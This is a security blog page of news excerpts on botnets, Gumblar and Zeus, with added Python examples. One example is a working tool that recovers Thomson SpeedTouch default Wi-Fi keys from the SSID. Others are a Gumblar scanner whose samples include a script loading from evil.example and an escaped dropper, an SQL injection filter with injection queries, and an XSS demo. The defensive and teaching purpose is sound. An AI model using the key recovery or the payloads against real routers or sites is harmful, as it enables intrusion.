viruses in images

The images of computer viruses
Source: TDSnews and InformationWeek

a set of 3D images created from the code and behaviour of a set of viruses

MYDOOM:

change the SSID of your wireless router

This is necessary because, for some manufacturers, the default WEP/WPA key can be derived from the SSID itself:

Default key algorithm in Thomson and BT Home Hub routers
Source: gnucitizen
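The gnucitizen write-up (building on Kevin Devine's analysis) describes the Thomson SpeedTouch scheme: the router takes part of its serial number, hashes it with SHA-1, and uses one end of the digest for the SSID suffix and the other for the default key, so the suffix broadcast in every beacon shrinks the key search to a few million hashes. The following is an added Python example written for this page, not code from gnucitizen or from the router firmware; it follows the published description, and the sample serial, the production-character alphabet and the search window are assumptions:

```python
import hashlib
import itertools
import string

# The three production characters of the serial; assumption: digits and
# upper-case letters, the alphabet the published key generator enumerates.
PROD_CHARS = string.digits + string.ascii_uppercase


def speedtouch_defaults(year, week, prod):
    """Return (ssid, key) for a SpeedTouch serial CP<YY><WW>..<PPP>.

    Following the published description: the router hashes
    'CP' + YY + WW + hex(PPP) with SHA-1, then uses the last 3 bytes of the
    digest as the SSID suffix and the first 5 bytes as the default WEP/WPA key.
    """
    prod_hex = "".join(f"{ord(c):02X}" for c in prod.upper())
    seed = f"CP{year:02d}{week:02d}{prod_hex}".encode("ascii")
    digest = hashlib.sha1(seed).hexdigest().upper()
    return "SpeedTouch" + digest[-6:], digest[:10]


def recover_keys(ssid, years, weeks):
    """Invert the derivation: list (serial, key) pairs whose SSID matches.

    The 24-bit SSID suffix leaks enough to make the search tiny: 36**3
    production codes per (year, week), so a window of a few years is only a
    few million SHA-1 calls. Collisions are possible, so an attacker simply
    tries every candidate key against the network.
    """
    suffix = ssid[-6:].upper()
    hits = []
    for year, week in itertools.product(years, weeks):
        for chars in itertools.product(PROD_CHARS, repeat=3):
            prod = "".join(chars)
            candidate_ssid, key = speedtouch_defaults(year, week, prod)
            if candidate_ssid.endswith(suffix):
                hits.append((f"CP{year:02d}{week:02d}{prod}", key))
    return hits


if __name__ == "__main__":
    # Constructed serial: year 06, week 15, production code 109.
    ssid, key = speedtouch_defaults(6, 15, "109")
    print("router advertises", ssid, "with default key", key)
    # Narrow window so the demo finishes in well under a second; an attacker
    # would sweep every week of every plausible production year.
    for serial, candidate in recover_keys(ssid, years=[6], weeks=[15]):
        print("candidate serial", serial, "-> key", candidate)
```

Run as-is it derives the defaults for the constructed serial and then recovers them from the SSID alone inside a one-week window; widening `years` and `weeks` is the actual attack. The defence is what the post says: change the SSID and, more importantly, the key.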

botnets seen from the inside

A series of amusing screenshots:

Inside the botnets that never make the news - a gallery
http://blogs.zdnet.com/security/?p=3432

"If you ever wanted to take an inside view of targeted-botnets primarily run by novice cybercriminals sometimes utilizing outdated, but very effective methods - this ZDNet photo gallery is for you."

Gumblar

"A malware exploit that has been circulating since March or so is picking up the pace lately, hijacking more than 3,000 websites as of this week. Gumblar's goal is to manipulate Google's results in order to affect as many PCs as possible, which has some researchers describing it as "a botnet of compromised websites."

"Security researchers are stepping up their warnings about the Gumblar malware exploit as it continues to hijack webpages and manipulate Google results. Gumblar recently got the attention of the United States Computer Emergency Readiness Team (US-CERT), which noted on its website that Gumblar is alive and well and continues to circulate by hijacking vulnerable Web applications, poor configuration settings, or simply by stealing FTP credentials.

Experts who have been tracking Gumblar since March say that the malware directly manipulates files on Web servers after getting access to them. From there, the attack changes the files to inject scripts and distribute more malicious code out of gumblar.cn or from other, varying IP addresses. The code appears to target sites that show up in Google searches, according to the ScanSafe STAT Blog, and although Google began delisting compromised websites months ago, the code keeps changing, keeping Google on its toes."

Source: ArsTechnica
http://arstechnica.com/security/news/2009/05/gumblar-exploit-hijacking-websites-and-picking-up-steam.ars
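As the quoted text says, Gumblar got into files on web servers (often with stolen FTP credentials) and injected script tags and obfuscated JavaScript into them. Below is an added Python example for this page, not code from the article or from any Gumblar sample, of the kind of sweep over a web root that surfaces those two injection styles: a script tag loading from a host that is not ours, and an inline script that unpacks an escaped payload. The sample files, host names and obfuscation heuristics are constructed for the example:

```python
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script\s*>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Calls that legitimate page scripts rarely need but droppers lean on.
OBFUSCATION_CALLS = ("eval(", "unescape(", "String.fromCharCode", "document.write(")
# A run of percent- or hex-escaped bytes: the payload hidden from a plain grep.
ESCAPED_RUN_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}|\\x[0-9A-Fa-f]{2}){8,}")


def scan_page(path, html, trusted_hosts):
    """Return a list of (path, kind, detail) findings for one file's contents."""
    findings = []
    for m in SCRIPT_RE.finditer(html):
        attrs, body = m.group(1), m.group(2)
        src = SRC_RE.search(attrs)
        if src:
            url = src.group(1)
            host = (urlparse(url).hostname or "").lower()
            # Relative URLs have no host: they load from our own server.
            if host and host not in trusted_hosts:
                findings.append((path, "external script", url))
        elif any(call in body for call in OBFUSCATION_CALLS) and ESCAPED_RUN_RE.search(body):
            findings.append((path, "obfuscated inline script", body.strip()[:60]))
    return findings


def scan_site(pages, trusted_hosts):
    """pages: {path: contents}. Scan every HTML/PHP file of a web root."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for path, html in sorted(pages.items()):
        findings.extend(scan_page(path, html, trusted))
    return findings


# Constructed sample files standing in for a web root. The second one carries
# the two injection styles described above: a script tag fetching from a
# foreign host and an escaped inline dropper.
SAMPLE_SITE = {
    "index.html": (
        "<html><head><script src=\"/js/app.js\"></script>"
        "<script src=\"https://cdn.example.org/lib.js\"></script>"
        "<script>var page = 'home';</script></head><body>ok</body></html>"
    ),
    "about.php": (
        "<?php include 'header.php'; ?>\n"
        "<p>About us</p>\n"
        "<script src=\"http://evil.example/x.php\"></script>\n"
        "<script>eval(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D'))</script>\n"
    ),
}

if __name__ == "__main__":
    for path, kind, detail in scan_site(SAMPLE_SITE, {"cdn.example.org"}):
        print(f"{path}: {kind}: {detail}")
```

The allowlist of script hosts is the part worth keeping current; the obfuscation heuristic is only a tripwire, since injected code changed constantly (as the article notes about Google's delisting). Pair the sweep with a check of the FTP log for logins from unexpected addresses, because that is how the files were reached.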

cyber-war: episode 3?

Analyst: cyberwarfare arms race with China imminent

A security expert informed Congress last month that the United States is entering a cyberwarfare arms race with China. Some of his information, however, seems to be misleading, especially about China's "top secret" OS.

Source: ArsTechnica

risk management

Risk Management is Where Money Is
Dan Geer, Nov. 1998

Given my biases, I am going to describe where the future of the security
marketplace is and where it is not. I will argue that the financial
community is and remains the place to look for "first light" for new
security technology. I will give you a rundown of what's new while I predict
what little time is left for many of today's products, purveyors and
regulators. I will argue that, in many ways, the party's over for the
security field as we know it now. I will range broadly because security, as
a concept, is universal. (...)

Risk Management Is Still Where the Money Is
Dan Geer, Computer, Dec. 2003

Five years ago, I gave a short speech at the Digital Commerce Society of Boston, titled “Risk Management Is Where the Money Is” (http://catless.ncl.ac.uk/Risks/20.06.html). In the speech, I proposed looking at security as a risk management proposition. Many things have changed since then, so perhaps it is time to reassess and to confirm in word what has been confirmed in deed. (...)

some tools for web application security

GreenSQL
http://www.greensql.net/
GreenSQL is an Open Source database firewall used to protect databases from SQL injection attacks. GreenSQL works as a proxy and has built in support for MySQL. The logic is based on evaluation of SQL commands using a risk scoring matrix as well as blocking known db administrative commands (DROP, CREATE, etc).
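To make the "risk scoring matrix plus blocked administrative commands" idea concrete, here is an added Python sketch of such a filter, written for this page rather than taken from GreenSQL; the patterns, weights and threshold are assumed values, and a real proxy parses the SQL instead of matching regular expressions:

```python
import re

# Illustrative risk matrix: (pattern, weight, description). The weights are
# assumptions for this example, not GreenSQL's own values.
RISK_RULES = [
    (re.compile(r"--|/\*|#"), 2, "comment token"),
    (re.compile(r"\bunion\b[\s\S]*\bselect\b", re.I), 4, "UNION SELECT"),
    (re.compile(r"\bor\b\s+(\d+|'[^']*')\s*=\s*\1", re.I), 4, "always-true condition"),
    (re.compile(r";\s*\w"), 3, "stacked statement"),
    (re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor)\b", re.I), 4, "timing probe"),
    (re.compile(r"\b(information_schema|mysql\.user|sysobjects)\b", re.I), 3, "schema enumeration"),
    (re.compile(r"\b(load_file|into\s+(?:out|dump)file)\b", re.I), 5, "file access"),
]

# Statements a web application should never issue through the proxy.
ADMIN_VERBS = {"drop", "create", "alter", "grant", "revoke", "truncate", "shutdown"}


def leading_verb(statement):
    """First keyword of a statement, lower-cased ('' if none)."""
    m = re.match(r"\s*([A-Za-z]+)", statement)
    return m.group(1).lower() if m else ""


def assess(query, threshold=4):
    """Return (verdict, score, reasons) for one query string.

    Administrative verbs are blocked outright; everything else is allowed
    unless the summed risk score reaches the threshold.
    """
    reasons = []
    score = 0
    for pattern, weight, label in RISK_RULES:
        if pattern.search(query):
            score += weight
            reasons.append(label)
    # Look at every statement, so a stacked "...; DROP TABLE x" is caught too.
    admin = [leading_verb(s) for s in query.split(";") if leading_verb(s) in ADMIN_VERBS]
    if admin:
        reasons.append("administrative command: " + ", ".join(v.upper() for v in admin))
        return "block", score, reasons
    return ("block" if score >= threshold else "allow"), score, reasons


if __name__ == "__main__":
    # Constructed queries: one benign, the rest typical injection shapes.
    for q in [
        "SELECT name FROM users WHERE id = 42",
        "SELECT name FROM users WHERE id = 1 OR 1=1 -- ",
        "SELECT * FROM users WHERE id = 1 UNION SELECT user, password FROM mysql.user",
        "SELECT id FROM items WHERE id = 3; DROP TABLE items",
        "DROP TABLE users",
    ]:
        verdict, score, reasons = assess(q)
        print(f"{verdict:5} score={score} {reasons}  <- {q}")
```

Note the false positives such a matrix produces (a `#` or `--` inside a legitimate string literal scores), which is why products of this kind ship a learning or whitelisting mode and why prepared statements in the application remain the primary fix; the proxy is defence in depth.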

w3af
http://w3af.sourceforge.net/
w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

(in)security on Twitter

an interesting article by Gary McGraw:

Software [In]Security: Twitter Security

"(...) But this is a security column, so lets spend a few minutes pondering the security ramifications of Twitter. I can think of a few right off the top of my head: it's easy to spoof someone on Twitter, it's a perfect vector for malicious code and phishing, Twitter allows dingbats to cash in their last remaining privacy chit, and it has a coolness factor that often overrides common sense."

Master's programmes

Applications are open until the end of May for the Master in Information Security / Master in Information Technology - Information Security (MSIT-IS), a dual degree from Carnegie Mellon Univ. / Univ. de Lisboa. Information at:
http://cmuportugal.di.fc.ul.pt/?MSc_in_Information_Security

Applications are also open for the other master's programmes in informatics at FCUL:
http://acesso.fc.ul.pt/

Output encoding and XSS attacks

An interesting article on the Coding Insecurity blog:
http://coding-insecurity.blogspot.com/2009/05/getting-output-encoding-right.html
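The linked article's point is that the encoding has to match the context the value lands in. As an added example for this page (not the blog's code), the Python below encodes one untrusted value for element content, a quoted attribute, a JavaScript string literal and a URL parameter, and includes the usual mistake of a single angle-bracket filter; `render_profile` and the payloads are constructed for the example:

```python
from urllib.parse import quote


def encode_html_text(value):
    """Element content: neutralise the characters that can start markup."""
    return (value.replace("&", "&amp;")
                 .replace("<", "&lt;")
                 .replace(">", "&gt;")
                 .replace('"', "&quot;")
                 .replace("'", "&#x27;"))


def encode_html_attr(value):
    """Quoted attribute value: encode everything but ASCII letters and digits,
    so no quote, space or '=' can turn data into a new attribute."""
    return "".join(c if c.isascii() and c.isalnum() else f"&#x{ord(c):X};"
                   for c in value)


def encode_js_string(value):
    """JavaScript string literal: \\xHH / \\uHHHH so no quote, backslash or
    '</script>' survives into the script parser (entities are NOT decoded here)."""
    out = []
    for c in value:
        if c.isascii() and c.isalnum():
            out.append(c)
        elif ord(c) < 0x100:
            out.append(f"\\x{ord(c):02X}")
        else:
            out.append(f"\\u{ord(c):04X}")
    return "".join(out)


def encode_url_param(value):
    """Query-string parameter value."""
    return quote(value, safe="")


def naive_escape(value):
    """The common mistake: strip only the angle brackets, for every context."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


def render_profile(name):
    """The same untrusted value in four contexts, each with its own encoder."""
    return (
        f"<p>Hello, {encode_html_text(name)}</p>\n"
        f'<input value="{encode_html_attr(name)}">\n'
        f"<script>var user = '{encode_js_string(name)}';</script>\n"
        f'<a href="/u?name={encode_url_param(name)}">profile</a>'
    )


if __name__ == "__main__":
    # Constructed payloads, one per context the naive filter misses.
    payloads = ['"><script>alert(1)</script>',
                '" onmouseover="alert(1)',
                "'; alert(1); //"]
    for p in payloads:
        print("naive filter leaves:", naive_escape(p))
        print(render_profile(p))
        print()
```

The second payload has no angle brackets at all, so `naive_escape` passes it through unchanged and it becomes an event handler inside the attribute; only the attribute encoder stops it. Likewise the third payload needs the JavaScript encoder, not HTML entities, because the script parser never decodes `&#x27;`.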

botnet shuts down 100,000 PCs

Botnet master hits the kill switch, takes down 100,000 PCs

"Botnets aren't just dangerous because they can steal massive amounts of personal data and launch denial-of-service attacks—they can also self-destruct, leaving the owners of affected machines in the dust. The controllers of one such botnet recently hit the kill switch for one reason or another, taking down some 100,000 infected computers with it.

(...) But Zeus had another interesting feature—one that isn't terribly uncommon among botnet software, it turns out. A command was built into the software to kos—or "kill operating system"—and it was apparently executed some time last month.

The reason for BSODing 100,000 machines isn't quite clear, but several security experts have offered up their opinions. S21sec wrote on its blog that those behind Zeus might have wanted more time to exploit the financial data they had harvested by removing the user's ability to get online and see that money was being transferred. On the other hand, (...) "Maybe the botnet was hijacked by another crime group," Hüssy told the Post. Or, he postulated, perhaps those behind Zeus were just dumb. (...)"

Source: ArsTechnica

Information security: trust

The question of trust (trust/trustworthiness) is much harder for data than for the service that delivers it. A very interesting article related to this (and, unfortunately, not only about data supplied by computer systems):

Wikipedia hoax points to limits of journalists' research

A sociology student placed a fake quote on Wikipedia, only to see it show up in prominent newspapers, revealing that a lot of the press doesn't go much further than most 'Net users when it comes to researching a story.

Excerpt:

"Fitzgerald was apparently curious how far his hoax would spread, and expected it to appear on a variety of blogs and similar sites. Instead, to his surprise, a search picked it up in articles that appeared at a variety of newspapers. Fitzgerald eventually removed his own fabricated quote and notified a variety of news outlets that they had been tricked, but not all of them have apparently seen fit to publish corrections or to ensure that their original stories were accurate, even though fixing a webpage shouldn't be a challenging thing."

Source: ArsTechnica

Is software complexity the reason for the lack of security?

an article that discusses this idea:

Shin, Y. and Williams, L., Is Complexity Really the Enemy of Software Security?, Quality of Protection Workshop at the ACM Conference on Computers and Communications Security (CCS) 2008, Alexandria, VA, pp. 47-50.

Software complexity is often hypothesized to be the enemy of
software security. We performed statistical analysis on nine
code complexity metrics from the JavaScript Engine in the
Mozilla application framework to investigate if this hypothesis
is true. Our initial results show that the nine complexity
measures have weak correlation (ρ=0.30 at best) with security
problems for Mozilla JavaScript Engine. The study should be
replicated on more products with design and code-level metrics.
It may be necessary to create new complexity metrics to
embody the type of complexity that leads to security problems.

The story of a hacker

as a comic strip... fun. There are several episodes; you need to keep clicking "next":

hacking a botnet for fun and profit

Researchers hijack botnet, score 56,000 passwords in an hour

The Torpig botnet was hijacked by the good guys for ten days earlier this year before its controllers issued an update and took the botnet back. During that time, however, researchers were able to gain a glimpse into the kind of information the botnet gathers as well as the behavior of Internet users who are prone to malware infections.

Full article
Source: http://arstechnica.com

important vulnerabilities in 5 web apps

Five 'must-secure' Web app vulnerabilities
by Ryan Naraine, ZeroDay

in fact these are not 5 vulnerabilities but vulnerabilities in 5 web apps:
1. Apache Geronimo Application Server
2. SAP cFolders
3. CS Whois Lookup
4. phpMyAdmin
5. Novell Teaming